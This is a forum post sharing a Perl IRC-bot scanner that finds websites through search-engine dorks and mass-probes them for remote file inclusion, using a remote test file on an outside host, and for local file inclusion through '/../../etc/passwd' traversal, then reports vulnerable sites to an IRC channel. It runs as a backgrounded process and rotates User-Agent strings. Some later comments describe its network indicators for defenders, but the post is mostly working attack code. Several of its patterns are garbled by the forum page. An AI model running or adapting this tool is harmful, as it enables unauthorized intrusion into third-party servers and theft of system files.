
:: RFI Scanner ::

 
Auteur Message
4l3x
Administrateur
Administrateur

Hors ligne

Inscrit le: 04 Nov 2009
Messages: 96

MessagePosté le: Dim 10 Jan - 21:19 (2010)    Sujet du message: RFI Scanner Répondre en citant

#!/usr/bin/perl
##########################################################################################################################
# Modified By : gore
#
#
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come

#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas !

#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# .scan Bug Dork ( COntone. <Jembik> !scan index.php?page= "index.php?page=" ) Normal RFi Scan
# .lfi Bug Dork ( Contone. <Jembik> !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# .autoscan Bug Dork ( COntone. <Jembik> !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# .autopath Bug Dork ( COntone. <Jembik> !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# .quit ( COntone. <Jembik> !quit ) make bot leave
# .info ( COntone. <Jembik> !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
#
###########################################################################################################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################
# Remote resources that Test() appends to every candidate URL. Each probe request
# therefore carries an absolute http:// URL inside a query-string value, which is
# the shape to look for in web-server access logs and WAF rules. Server-side, the
# PHP allow_url_include setting governs whether such an include is fetched at all.
my $response = "http://www.mahbaran.com/load/response.jpg?"; # included in zip
my $test = "http://www.mahbaran.com/load/test.txt?"; # included in zip as test.txt
# Suffix appended to a URL when Test() reports it to the channel.
my $printcmd = "[ucid4]";
# Traversal suffix used by Testlfi(): the first value is requested, the second is
# appended to the URL that gets reported. Both hold the same string.
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
# Not referenced anywhere else in the visible listing.
my $spread = "http://bugdork.wordpress.com?";
# IRC identity and control channel, all hard-coded. The nick is "bugdork[" plus a
# digit 0-4 plus "]", and the connection is plaintext IRC on port 6667, so the
# server name, channel, nick pattern and ident are usable as network indicators.
my $nickname ="bugdork[".int(rand(5))."]";
my $ident = "bugdork";
my $channel = "#scan";
my $server = "irc.bugdork.net";
my $port = 6667;
#################
#[Configuration]#
#################

# File-scoped socket shared by connectirc() (which opens it) and message().
my $sock;
# Modulus used by Test()/Testlfi() to decide when forked children are waited on.
my $exploitcounter = 100;
# Pool of User-Agent strings; Query() picks one at random per request.
my @User_Agent = &Agent();
# The parent exits at once and the child carries on into the IRC loop, so the
# running process is not the one that was started from the shell.
my $pid = fork();
if($pid==0){
&connectirc($nickname,$ident,$channel,$server,$port);
}else{
exit(0);
}

# Connect to the IRC server, register, join the channel and then act on every
# line received from the socket.
#
# Parameters (positional): nickname, ident, channel, server, port.
# Does not return while the socket keeps delivering lines.
#
# The command patterns below are unanchored and never look at the sender prefix
# of the IRC line, so the code as written does not distinguish between channel
# members. Each scan-type command runs in its own forked child.
#
# NOTE(review): several patterns on this page look altered by the forum
# rendering (the PING pattern near the end has an unmatched parenthesis); they
# are reproduced exactly as posted.
sub connectirc(){
my($nickname,$ident,$channel,$server,$port)=@_;
# Plain TCP, no TLS; the result of new() is not checked before use.
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
# Registration sequence; the USER real-name field is a constant string.
print $sock "NICK ".$nickname."\r\n";
print $sock "USER ".$ident." 8 * : PitBull CreW\r\n";
print $sock "JOIN ".$channel."\r\n";
# $command is an undeclared package variable (the file does not enable strict).
while( $command = <$sock> ){

# Two captures are handed to scan() as ($bug,$dork).
if($command =~ /.scans+(.*?)s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}

# Two captures are handed to autoscan() as ($bug,$dork).
if($command =~ /.autoscans+(.*?)s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&autoscan($bug,$dork);
exit(0);
}
}

# One capture is handed to autopath() as $dork.
if($command =~ /.autopaths+(.*)/){
if(fork() == 0){
my($dork)=($1);
&autopath($dork);
exit(0);
}
}

# Two captures are handed to lfi() as ($bug,$dork).
if($command =~ /.lfis+(.*?)s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&lfi($bug,$dork);
exit(0);
}
}

# Help text sent to the channel as a series of PRIVMSG lines.
if($command =~ /.info/){
&message($channel,"4[Help] 12Public Scanner from -> 2 jembik jembik crew ");
&message($channel,"4[Help] 12Gunakno Command e -> 2 !");
&message($channel,"4[Help] 12Perintah e -> 2 scan <string> <dork> ");
&message($channel,"4[Help] 12Perintah e -> 2 autoscan <string> <dork>k ");
&message($channel,"4[Help] 12perintah e -> 2 autopath <inject> ");
&message($channel,"4[Help] 12perintah e -> 2 lfi <string> <dork> ");
&message($channel,"4[Help] 12perintah e -> 2 quit <ra tak dudoh i ... ben kwapok> ");
&message($channel,"4[Help] 12Selamad Menikmati jok lali lek oleh hasile bagi-bagi coi ... ");
}

# Calls quit and exits. No sub named quit is defined in the visible listing.
if($command =~ /.gore/){
&quit;
exit(0);
}

# Second trigger that terminates the process.
if($command =~ /.cok/){
exit(0);
}

# Keep-alive reply: answers a server PING with PONG carrying the first capture.
if($command =~ /^PING Sad.*)/){
print $sock "PONG :$1";
}
}
}

# Run one remote-file-inclusion pass: harvest hosts for $dork with Find(), then
# probe them with Test() using $bug as the path fragment. Start and end are
# announced on the channel.
sub scan(){
my($bug,$dork)=@_;
# As posted, this removes every character in the class [rn] from the dork.
$dork =~ s/[rn]//g;
my $counter = 0; # never read in this sub
&message($channel,"4[gore] 12Scanner e wes dimulai mekan -> 2".$dork);
&Find($dork);
&Test($bug);
&message($channel,"4[gore] 12Scanner e wes mari -> 2".$dork);
}

# Run one local-file-inclusion pass: harvest hosts for $dork with Find(), then
# probe them with Testlfi() using $bug as the path fragment. Start and end are
# announced on the channel.
sub lfi(){
my($bug,$dork)=@_;
# As posted, this removes every character in the class [rn] from the dork.
$dork =~ s/[rn]//g;
my $counter = 0; # never read in this sub
&message($channel,"4[gore] 12LFI e wes dimulai mekan -> 2".$dork);
&Find($dork);
&Testlfi($bug);
&message($channel,"4[gore] 12Scanner e wes mari -> 2".$dork);
}

# Repeat the scan() sequence once per entry returned by SiteDomains(), with
# "+site:<entry>" appended to the dork each time.
# A dork that already contains "site:" is rejected and the child process exits.
sub autoscan(){
my @domini = &SiteDomains();
my($bug,$dork)=@_;
# As posted, this removes every character in the class [rn] from the dork.
$dork =~ s/[rn]//g;
&message($channel,"4[+] 12Auto-Dork-Scanner Dimulai -> 2".$dork);
if($dork =~ /site:/){
&message($channel,"4[jembik] 12Wadow bos enenk seng eror ki sajak e");
exit(0);
}
# One Find() + Test() round per domain suffix.
foreach my $Domains(@domini){
my $auto_dork = $dork."+site:".$Domains;
&message($channel,"4[gore] 12Adding AutoDork ->".$auto_dork);
&Find($auto_dork);
&Test($bug);
&message($channel,"4[gore] 12Scanner e wes mari -> 2".$dork);
}
}

# Repeat the Find() + Test() sequence once per entry returned by Paths(), with
# the entry prefixed to $dork; the combined string is used both as the search
# term and as the path fragment handed to Test().
# A dork containing "index" is rejected and the child process exits.
sub autopath(){
my @path = &Paths();
my($dork)=@_;
# As posted, this removes every character in the class [rn] from the dork.
$dork =~ s/[rn]//g;
&message($channel,"4[+] 12Auto-Path-Scanner Dimulai -> 2".$dork);
if($dork =~ /index/){
&message($channel,"4[jembik] 12Wadow bos enenk seng eror ki sajak e");
exit(0);
}
foreach my $pathi(@path){
my $auto_path = $pathi.$dork;
&message($channel,"4[gore] 12Adding AutoPath -> 2 ".$auto_path);
&Find($auto_path);
&Test($auto_path);
# NOTE(review): auto_path below has no sigil; without strict it is taken as a
# bareword, so the literal text is appended rather than the variable's value.
&message($channel,"4[gore] 12Scanner Selesai -> 2".auto_path);
}
}

# Probe every harvested host for remote file inclusion and report matches to
# the channel.
#
# $_[0] is the path fragment ("bug") placed between the host and the remote URL.
# The host list comes from GetLink(), is de-duplicated with Unique(), and the
# on-disk lists are deleted with Remove() before probing starts.
#
# What a target sees: one GET per candidate, 3-second timeout, a User-Agent
# drawn from the Agent() pool, and a query string that ends in the remote
# test URL. One child process is forked per candidate.
sub Test(){
my $counter = 0;
my $bug = $_[0];
my @links = &GetLink();
my @forks;
my $forked++; # never read again in this sub
&message($channel,"4[gore] 12Total Sites ->2 ".scalar(@links));
my @uni = &Unique(@links);
&message($channel,"4[gore] 12Cleaned Sites ->2 ".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $site (@uni){
$counter++;
# $test and $response are the file-level remote URLs.
my $link = "http://".$site.$bug.$test."?";
my $responser = "http://".$site.$bug.$response."?";
print($link."\n"); # Prints test links in terminal
# Every $exploitcounter-th candidate: wait for the recorded children, then
# start filling @forks from index 0 again.
if($counter %$exploitcounter == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
# The next two statements cancel out; $start is never used as an index here.
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
# Child: fetch the candidate and look for marker strings in the body. The
# markers are presumably printed by the remote test file, whose contents are
# not part of this page.
my $htmlsite = &Query($link,"3");
if($htmlsite =~ /SafemodeOFF/){
# Second request with the other remote file before reporting.
my $responsing = &Query($responser,"3");
if($responsing =~ /SafeOFF/){
&message($channel,"4[Hasil] 12Ki temu Vuln e SafeMode 3OFF12 ->2 "."http://".$site.$bug.$printcmd);
}}
elsif($htmlsite =~ /SafemodeON/){
&message($channel,"4[Hasil] 12Ki temu Vuln e SafeMode 4ON12 ->2 "."http://".$site.$bug.$printcmd);
}
exit(0);
}
# Progress line to the channel every 150 candidates.
if($counter %150 == 0){
&message($channel,"4[Loading] 12Exploiting ->2 ".$counter." out of ".$testx);
}
$startx++;
}
# Final wait for whatever children are still recorded in @forks.
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
}

# Probe every harvested host for local file inclusion and report matches to
# the channel. Same structure as Test(), with a single request per candidate.
#
# $_[0] is the path fragment ("bug") placed between the host and the traversal
# suffix $responselfi. A response body containing "root:x:" counts as a match.
#
# What a target sees: one GET per candidate whose URL ends in a run of "../"
# segments followed by /etc/passwd, 3-second timeout, User-Agent drawn from
# the Agent() pool.
sub Testlfi(){
my $counter = 0;
my $bug = $_[0];
my @links = &GetLink();
my @forks;
my $forked++; # never read again in this sub
&message($channel,"4[gore] 12Total Sites ->2 ".scalar(@links));
my @uni = &Unique(@links);
&message($channel,"4[gore] 12Cleaned Sites ->2 ".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $site (@uni){
$counter++;
my $link = "http://".$site.$bug.$responselfi;
print($link."\n"); # Prints test links in terminal
# Every $exploitcounter-th candidate: wait for the recorded children, then
# start filling @forks from index 0 again.
if($counter %$exploitcounter == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
# The next two statements cancel out; $start is never used as an index here.
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
# Child: fetch the candidate and look for a passwd-style line in the body.
my $htmlsite = &Query($link,"3");
if($htmlsite =~ /root:x:/){
&message($channel,"4[start] 12LFI ->2 "."http://".$site.$bug.$printcmdlfi);
}
exit(0);
}
# Progress line to the channel every 150 candidates.
if($counter %150 == 0){
&message($channel,"4[loading] 12Exploiting ->2 ".$counter." out of ".$testx);
}
$startx++;
}
# Final wait for whatever children are still recorded in @forks.
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
}

# Query four search engines in parallel for $_[0], one forked child per engine,
# and wait for all four to finish.
# Each child announces its result count on the channel. The results reach the
# parent only through the per-engine text files written by Links().
# NOTE(review): Yahoo() is called here but no sub of that name is defined in
# the visible listing.
sub Find(){
my $dork = $_[0];
my @proc;
$proc[0] = fork();
if($proc[0] == 0){
&message($channel,"4[Start] 12Google ->2 ".scalar(&Google($dork)));
exit;
}
$proc[1] = fork();
if($proc[1] == 0){
&message($channel,"4[Start] 12Yahoo ->2 ".scalar(&Yahoo($dork)));
exit;
}
$proc[2] = fork();
if($proc[2] == 0){
&message($channel,"4[Start] 12AllTheWeb ->2 ".scalar(&Alltheweb($dork)));
exit;
}
$proc[3] = fork();
if($proc[3] == 0){
&message($channel,"4[Start] 12UOL ->2 ".scalar(&UOL($dork)));
exit;
}

# Block until every engine child has exited.
waitpid($proc[0],0);
waitpid($proc[1],0);
waitpid($proc[2],0);
waitpid($proc[3],0);
}

# Send one IRC PRIVMSG over the file-scoped socket.
# $who is the target (channel or nick), $what is the message text. Forked
# children call this too, so they write to the same socket as the parent.
sub message(){
my ($who,$what)=@_;
print $sock "PRIVMSG ".$who." :".$what."\r\n";
}

# Collect result hosts for $dork from Google: ten result pages of 100, each
# requested from a randomly chosen country domain out of GoogleDomains().
# Matches are passed through Links(), which also appends them to google.txt.
# Returns the accumulated list that Links() produced.
# NOTE(review): the pattern on the while line contains forum markup as posted;
# it is reproduced unchanged.
sub Google(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my @dom = &GoogleDomains();
my $file = "google.txt";
my $html;
my @result;
# All pages are concatenated into $html before any parsing happens.
for($start=0;$start < $max; $start += $num){
my $Domains = $dom[rand(scalar(@dom))];
$html.=&Query("http://www.google.".$Domains."/search?q=".$dork."&num=".$num."&sa=N&filter=0&start=".$start);
}
while($html =~ m/<h2 class=r>[url=http:\/\/(.+?)\]http://(.+?)</Url>/g){
# Captures containing "yahoo" are skipped.
$1 =~ /yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}

# Collect result hosts for $dork from alltheweb.com: ten result pages of 100.
# Matches are passed through Links(), which also appends them to alltheweb.txt.
# Returns the accumulated list that Links() produced.
sub Alltheweb(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "alltheweb.txt";
my $html;
my @result;
# All pages are concatenated into $html before any parsing happens.
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
}
while($html =~ m/<span class="resURL\">http:\/\/(.+?)\ /g){
# Captures containing "alltheweb" are skipped.
$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
}
return(@result);
}

# Collect result hosts for $dork from busca.uol.com.br: fifty result pages,
# stepping the start offset by 20 up to 1000.
# Matches are passed through Links(), which also appends them to UOL.txt.
# Returns the accumulated list that Links() produced.
sub UOL(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=20;
my $max=100*10;
my $file = "UOL.txt";
my $html;
my @result;
# All pages are concatenated into $html before any parsing happens.
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://busca.uol.com.br/www/index.html?q=".$dork."&start=".$start);
}
# Every http:// href on the page is a candidate, not only result links.
while($html =~ m/<a href="http:\/\/([^>\"]*)/g){
# Captures containing "busca", "uol" or "yahoo" are skipped.
$1 =~ /busca|uol|yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}

# Perform one HTTP GET and return the response body.
# $link is the URL; $timeout is passed to LWP::UserAgent->timeout. Callers that
# omit it (the search-engine subs) pass undef.
# The User-Agent header is picked at random from @User_Agent on every call, so
# requests from one run do not share a single client string.
# The body is returned whatever the HTTP status; no error check is made.
sub Query(){
my($link,$timeout)=@_;
my $req=HTTP::Request->new(GET=>$link);
my $ua=LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout($timeout);
# This lexical shadows the file-level $response configuration variable.
my $response=$ua->request($req);
return $response->content;
}

# Escape a search term for use in a query string.
# Only seven characters are rewritten: space becomes "+", and : / & " \ ,
# become their %XX forms. Everything else passes through unchanged, so this is
# not a general URL encoder.
sub Key(){
    my ($term) = @_;
    my %escape_for = (
        ' '  => '+',
        ':'  => '%3A',
        '/'  => '%2F',
        '&'  => '%26',
        '"'  => '%22',
        '\\' => '%5C',
        ','  => '%2C',
    );
    # One pass suffices: no replacement text contains a character that is
    # itself rewritten.
    $term =~ s{([ :/&"\\,])}{$escape_for{$1}}g;
    return $term;
}

# Read the per-engine result files from the current working directory and
# return every line, with CR/LF removed, as one list.
# Only google.txt, alltheweb.txt and UOL.txt are written by subs in the visible
# listing; the other names have no writer here. The filenames are a host
# artifact of a run in progress, since Remove() deletes them afterwards.
sub GetLink(){
my @file = ("google.txt","yahoo.txt","abacho.txt","gigablast.txt","msn.txt","virgilio.txt","seekport.txt","alltheweb.txt","aol.txt","UOL.txt");
my $link;
my @total;
foreach my $n (@file){
# Bareword handle; the open result is not checked.
open(F,'<',$n);
while($link = <F>){
$link=~s/[\r\n]//g;
push(@total,$link);
}
close(F);
}
return(@total);
}

# Delete the per-engine result files from the current working directory.
# Each file is removed by a separate shell command, so a run spawns ten
# short-lived "rm -rf <name>" processes per scan round. The names are fixed
# literals, not external input.
sub Remove(){
my @file = ("google.txt","yahoo.txt","abacho.txt","gigablast.txt","msn.txt","virgilio.txt","seekport.txt","alltheweb.txt","aol.txt","UOL.txt");
foreach my $n (@file){
system("rm -rf ".$n);
}
}

# Derive host and directory forms from one result URL, append a line to the
# given file, and return the three derived values.
# $link is the URL text; $file_print is the file opened in append mode.
# Returns ($link, $host, $host_dir). $link is rebuilt from $host, so the first
# two elements are the same string.
sub Links(){
my ($link,$file_print) = @_;
$link=~s/http:\/\///g;
my $host = $link;
my $host_dir = $host;
my @links;
# Drop the last path segment to get the directory form.
$host_dir=~s/(.*)\/[^\/]*$/\1/;
# Keep only the leading run of host-name characters.
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# End() gives each value a single trailing slash.
$host_dir=&End($host_dir);
$host=&End($host);
$link=&End($host);
push(@links,$link,$host,$host_dir);
# $file is an undeclared package variable used as the handle; open is unchecked.
open($file,'>>',$file_print);
# NOTE(review): as posted, the string interpolates $linkn, $host_dirn and
# $hostn, none of which is assigned in the visible listing.
print $file "$linkn$host_dirn$hostn";
close($file);
return @links;
}

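# Return $_[0] with a trailing slash added and every run of consecutive
# slashes collapsed to one.
# The working copy is lexical. The original assigned to an undeclared $string,
# which wrote to a package global on every call.
sub End(){
    my $path = $_[0];
    $path .= "/";
    # Same result as replacing "//" with "/" repeatedly until none is left.
    $path =~ s{/{2,}}{/}g;
    return $path;
}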

# Return the arguments with duplicates dropped, keeping the order in which
# each value first appeared.
sub Unique{
    my %already_seen;
    # The post-increment is false only the first time a value is met.
    return grep { !$already_seen{$_}++ } @_;
}

# Return the fixed pool of User-Agent strings that Query() draws from.
# Every entry is a legacy browser identifier (MSIE 1.5-7.0b, Firefox 1.0-2.0,
# Konqueror 3.1, Netscape-era Mozilla), so traffic from a run shows many old,
# mutually inconsistent client strings coming from one source address.
sub Agent(){
    my @agents = (
        "Microsoft Internet Explorer/4.0b1 (Windows 95)",
        "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
        "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
        "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
        "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
        "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
        "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
        "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
        "Microsoft Pocket Internet Explorer/0.6",
        "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
        "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
        "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1Wink",
        "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1Wink",
        "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1Wink",
        "Advanced Browser (http://www.avantbrowser.com)",
        "Avant Browser (http://www.avantbrowser.com)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
        "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
        "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
        "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
        "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
        "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
        "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
        "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
        "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
        "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
        "Mozilla/3.0 (OS/2; U)",
        "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
        "Mozilla/4.61 (Macintosh; I; PPC)",
        "Mozilla/4.61 [en] (OS/2; U)",
        "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
        "Mozilla/4.8 [en] (Windows NT 5.0; U)",
    );
    return @agents;
}

# Return the country-domain suffixes that Google() appends to "www.google."
# when it picks a host for each result page.
sub GoogleDomains(){
    my @suffixes = qw(
        ae com.ar at com.au be com.br ca ch cl de dk fi fr gr com.hk
        ie co.il it co.jp co.kr lt lv nl com.pa com.pe pl pt ru com.sg
        com.tr com.tw com.ua co.uk hu
    );
    return @suffixes;
}

# Return the suffixes that autoscan() appends to a dork as "+site:<suffix>".
# "be" appears twice in the list, so autoscan() runs that suffix twice.
sub SiteDomains(){
    my @suffixes = qw(
        de nl be dk sk com net org
        info uk se it fr hu pl ru
        ro be cz edu jp
    );
    return @suffixes;
}

# Return the script-name prefixes that autopath() puts in front of the
# supplied parameter name to form each search term and path fragment.
sub Paths(){
    my @prefixes = qw(
        index.php? index2.php? index3.php? home.php? menu.php?
        file.php? config.php? contact.php? about.php?
    );
    return @prefixes;
}

#sub sitebypass(){
# my $dork=@_;
# $dork=&Key($dork);
# my @site=(
# "at","be","ca","de","fr",
# "it","nl","pl","ru","mx","edu"
# );
#
# my @pids;
# my $i=0;
# foreach my $sites(@site)
# {
# $pids[$i]=fork();
# if($pids[$i]==0)
# {
# my $engine=&engine($dork,$sites);
# exit(0);
# }
# $i++;
# }
# for($i=0;$b<=$i;$b++){
# waitpid($pids[$b],0);
# }
#push(@result, $engine );
#return(@result)
#}

